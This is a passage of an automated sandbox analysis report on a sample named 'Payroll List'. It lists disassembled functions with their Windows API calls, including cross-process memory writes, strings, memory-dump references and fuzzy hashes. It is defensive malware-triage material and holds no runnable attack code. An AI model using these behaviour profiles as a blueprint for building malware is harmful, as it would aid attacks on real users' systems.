                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: 98e5cc17fa420bf9b9540f3ae42c608202105f9c8443c767763a10bc7795e9e7
                                                                    • Instruction ID: bbb4122911e70dabfa1eb94ec8946ebee316665526cf0803d747e2e93b43e2b8
                                                                    • Opcode Fuzzy Hash: 98e5cc17fa420bf9b9540f3ae42c608202105f9c8443c767763a10bc7795e9e7
                                                                    • Instruction Fuzzy Hash: 310178B6600608FBEB104F68EC44EAABBADEB45752F148024FD06DA610D774DD889BA1
                                                                    Function 0015AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0015AA79
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0015AA83
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0015AA92
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0015AA99
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0015AAAF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: ca1b4242bd7792ca005103a1a987cce2d85de739fe97f27f9f005f73a952eff7
                                                                    • Instruction ID: 3ffecea194d252257ea14d60539d75dd7a6e244de614e6dd5f5f83ee1d9d51ad
                                                                    • Opcode Fuzzy Hash: ca1b4242bd7792ca005103a1a987cce2d85de739fe97f27f9f005f73a952eff7
                                                                    • Instruction Fuzzy Hash: 32F06271240708AFEB115FA4EC89EA73BACFF4A755F400519FD52CB590DB609C85CB61
                                                                    Function 0015AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0015AADA
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0015AAE4
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015AAF3
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0015AAFA
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015AB10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 21ff038b4ab3ea78f0cf59a6c0eac9cf4c5dcfad1e77aaa7294fe803bece74f3
                                                                    • Instruction ID: dc88510f09828806c0245a42a0cdab607123ef3133e44b56746334a214738d87
                                                                    • Opcode Fuzzy Hash: 21ff038b4ab3ea78f0cf59a6c0eac9cf4c5dcfad1e77aaa7294fe803bece74f3
                                                                    • Instruction Fuzzy Hash: 6DF04F71240708AFEB110FA4FC88EA73B6DFF46755F400129F952CB590DB60A8458AB1
                                                                    Function 0015EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0015EC94
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0015ECAB
                                                                    • MessageBeep.USER32(00000000), ref: 0015ECC3
                                                                    • KillTimer.USER32(?,0000040A), ref: 0015ECDF
                                                                    • EndDialog.USER32(?,00000001), ref: 0015ECF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 5e20621070630268e98ab1c3d38eda38d73ce22f7442fd3c4a1f04cd513338bb
                                                                    • Instruction ID: c83bf20ed362c34e573a15badaa903988a8944ab858b5c9ace129eeec79cbac6
                                                                    • Opcode Fuzzy Hash: 5e20621070630268e98ab1c3d38eda38d73ce22f7442fd3c4a1f04cd513338bb
                                                                    • Instruction Fuzzy Hash: D701A930900B14DBEB295B50EE4EB9677B8FF01706F004559B9A7658E0DBF0EA98CB40
                                                                    Function 0013B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 0013B0BA
                                                                    • StrokeAndFillPath.GDI32(?,?,0019E680,00000000,?,?,?), ref: 0013B0D6
                                                                    • SelectObject.GDI32(?,00000000), ref: 0013B0E9
                                                                    • DeleteObject.GDI32 ref: 0013B0FC
                                                                    • StrokePath.GDI32(?), ref: 0013B117
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: 8e0be176d6099d16d85e265b92b78976a6e45b45c943ce2e5281747e20b0cbfe
                                                                    • Instruction ID: 52919e4ba95bfb75865c3fbcf4da5b61154a55091660259ea29e621dbec098f5
                                                                    • Opcode Fuzzy Hash: 8e0be176d6099d16d85e265b92b78976a6e45b45c943ce2e5281747e20b0cbfe
                                                                    • Instruction Fuzzy Hash: EAF01970004684EFCB259FA5FD8C79D3B64A705362F488314F566488F0D7708AD6DF10
                                                                    Function 0016F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0016F2DA
                                                                    • CoCreateInstance.OLE32(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016F2F2
                                                                    • CoUninitialize.OLE32 ref: 0016F555
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                    • String ID: .lnk
                                                                    • API String ID: 948891078-24824748
                                                                    • Opcode ID: e502d42f13828f77b326ef905b37300685a944006ddebbdec4e6300fcc72329d
                                                                    • Instruction ID: fbbfb788dc113c92a9de24db62500ac3c464efc0c8ddd6f450214e680c95c48b
                                                                    • Opcode Fuzzy Hash: e502d42f13828f77b326ef905b37300685a944006ddebbdec4e6300fcc72329d
                                                                    • Instruction Fuzzy Hash: CAA12971104201AFD700EF64DC81EAFB7ACEFA9714F00491DF55697192EB70EA59CBA2
                                                                    Function 0016E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0012660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001253B1,?,?,001261FF,?,00000000,00000001,00000000), ref: 0012662F
                                                                    • CoInitialize.OLE32(00000000), ref: 0016E85D
                                                                    • CoCreateInstance.OLE32(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016E876
                                                                    • CoUninitialize.OLE32 ref: 0016E893
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    • Opcode ID: 50772eb6df82515da1b770f3cc747f8a0dd0b73efdddf27ad75f10582198d20a
                                                                    • Instruction ID: ecf5414d0c2a060b4d37531006cf84d39fb6fee45607ed9ce97df8bb0ecb5950
                                                                    • Opcode Fuzzy Hash: 50772eb6df82515da1b770f3cc747f8a0dd0b73efdddf27ad75f10582198d20a
                                                                    • Instruction Fuzzy Hash: 90A155396043119FCB14DF24C88496EBBE5BF89314F048A88F99A9B3A1CB31EC55CB91
                                                                    Function 0014325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 001432ED
                                                                      • Part of subcall function 0014E0D0: __87except.LIBCMT ref: 0014E10B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: 814fc57a9bf83d5ab5afefde90c4f9d6906be4b61d56b95cc3b6384127586795
                                                                    • Instruction ID: 433b731feb845abd8a63df1dca24426fb8ba8c9d5d3799f78f33e0433de2fea8
                                                                    • Opcode Fuzzy Hash: 814fc57a9bf83d5ab5afefde90c4f9d6906be4b61d56b95cc3b6384127586795
                                                                    • Instruction Fuzzy Hash: 00515A31A0820296CB15BB14C94177E7BD4BB50B20F348E28F4E6822F9DFB48DD8DA42
                                                                    Function 00164606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,001BDC50,?,0000000F,0000000C,00000016,001BDC50,?), ref: 00164645
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001646C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                    • String ID: REMOVE$THIS
                                                                    • API String ID: 3797816924-776492005
                                                                    • Opcode ID: 336ec13594a6e24849482d7cb1f8d0a5a9f7e2c658a151129db7c5bfbdc310a8
                                                                    • Instruction ID: 4c612716c5b36d9645d38760513fd32e1e493b775119e482deb99a98363fbef1
                                                                    • Opcode Fuzzy Hash: 336ec13594a6e24849482d7cb1f8d0a5a9f7e2c658a151129db7c5bfbdc310a8
                                                                    • Instruction Fuzzy Hash: 9641A134A002199FCF04EFA4DC81AAEB7B5FF59304F148069E916AB3A2DB30DD65CB50
                                                                    Function 0015C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0016430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015BC08,?,?,00000034,00000800,?,00000034), ref: 00164335
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0015C1D3
                                                                      • Part of subcall function 001642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00164300
                                                                      • Part of subcall function 0016422F: GetWindowThreadProcessId.USER32(?,?), ref: 0016425A
                                                                      • Part of subcall function 0016422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0015BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0016426A
                                                                      • Part of subcall function 0016422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0015BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00164280
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015C240
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015C28D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 4ea56f7881f197294ad674ae448df04cf286a8f4e550147548b46ed9b4425f46
                                                                    • Instruction ID: 917f19b83a4a04693c21c4c683f7abe3d1a3c6895c85eda2849c1997f47a39d9
                                                                    • Opcode Fuzzy Hash: 4ea56f7881f197294ad674ae448df04cf286a8f4e550147548b46ed9b4425f46
                                                                    • Instruction Fuzzy Hash: 4E413C76900218BFDB10DFA4DC81AEEB778BF19700F104099FA55BB181DB716E99CBA1
                                                                    Function 0018A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001BDC00,00000000,?,?,?,?), ref: 0018A6D8
                                                                    • GetWindowLongW.USER32 ref: 0018A6F5
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0018A705
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 0fc356a1da8ced22064a0ed2a3dbedfe1dc12a231b60444136139222cf19a3a7
                                                                    • Instruction ID: 61cfc9090b487b56b7bd76fbe5b029c34c4313ae96217efe343a7a83a89e66c9
                                                                    • Opcode Fuzzy Hash: 0fc356a1da8ced22064a0ed2a3dbedfe1dc12a231b60444136139222cf19a3a7
                                                                    • Instruction Fuzzy Hash: 1031CF71200606AFEB119F38DC81BEA7BA9FF49324F244726F975932E0D771AD509B50
                                                                    Function 0018A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0018A15E
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0018A172
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0018A196
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: a951d94efef2c3c6c2c7c9bad49780d7cbf6cce7c1c6b1397b83d7f6cf0977b3
                                                                    • Instruction ID: 1da70b04f53b2615071c017dce74c6534fb224251c5c4a48d1c30abbd7a44c08
                                                                    • Opcode Fuzzy Hash: a951d94efef2c3c6c2c7c9bad49780d7cbf6cce7c1c6b1397b83d7f6cf0977b3
                                                                    • Instruction Fuzzy Hash: 3021A132510218BBEF159F94CC86FEA3BBAEF48714F110215FA556B1D0D7B5AC51CB90
                                                                    Function 0018A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0018A941
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0018A94F
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0018A956
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 67841e2dae34401809fb5d430d2f2f1efc257cda92bb5118decef34d90441651
                                                                    • Instruction ID: 8877b55dd330721de90e13565756c941e22e89b7273724d9527279858368d7fe
                                                                    • Opcode Fuzzy Hash: 67841e2dae34401809fb5d430d2f2f1efc257cda92bb5118decef34d90441651
                                                                    • Instruction Fuzzy Hash: DB21B2B5600209BFEB00EF58DCC1DAB37ADEF5A358B45005AFA049B261CB70EC51CB61
                                                                    Function 001899A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00189A30
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00189A40
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00189A65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: f834b2fa423c9748c8268e46ff2183be9ac9114c3bba879cab7eb212945d4d6e
                                                                    • Instruction ID: f1ddf04de76df091a54da4889151b82b73155daf238f1ee6af126994e1fe364d
                                                                    • Opcode Fuzzy Hash: f834b2fa423c9748c8268e46ff2183be9ac9114c3bba879cab7eb212945d4d6e
                                                                    • Instruction Fuzzy Hash: 3521F232600118BFDF259F54DC85EBF3BAAEF89764F058128F9459B190C7719C518BA0
                                                                    Function 0018A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0018A46D
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0018A482
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0018A48F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 0d7213e711c61a2764940bb8830057c6574c45cd8ca64898216d30dafb2cff80
                                                                    • Instruction ID: 4618d638bab4c3d4e1a0468877835741305c7a517715790d1c6c7702fc68756c
                                                                    • Opcode Fuzzy Hash: 0d7213e711c61a2764940bb8830057c6574c45cd8ca64898216d30dafb2cff80
                                                                    • Instruction Fuzzy Hash: C2110A71200208BFEF246F64CC45FAB3769EF89754F064119FA4596091D3B1E811CB20
                                                                    Function 00142287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00142350,?), ref: 001422A1
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 001422A8
                                                                    Strings
                                                                    Memory Dump Source
